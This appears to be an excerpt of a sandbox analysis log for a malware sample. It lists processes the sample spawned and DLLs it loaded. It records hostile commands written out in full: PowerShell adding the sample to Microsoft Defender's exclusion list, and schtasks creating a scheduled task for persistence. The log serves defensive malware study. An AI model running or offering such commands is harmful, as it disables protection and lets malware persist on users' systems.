                Source: unknownProcess created: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess created: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe "C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe"
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\OtldpQxzAw.exe"Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe"Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp53CF.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess created: C:\Users\user\Desktop\OtldpQxzAw.exe "C:\Users\user\Desktop\OtldpQxzAw.exe"Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess created: C:\Users\user\Desktop\OtldpQxzAw.exe "C:\Users\user\Desktop\OtldpQxzAw.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess created: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe "C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe"Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: rasman.dll
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: rtutils.dll
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: schannel.dll
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
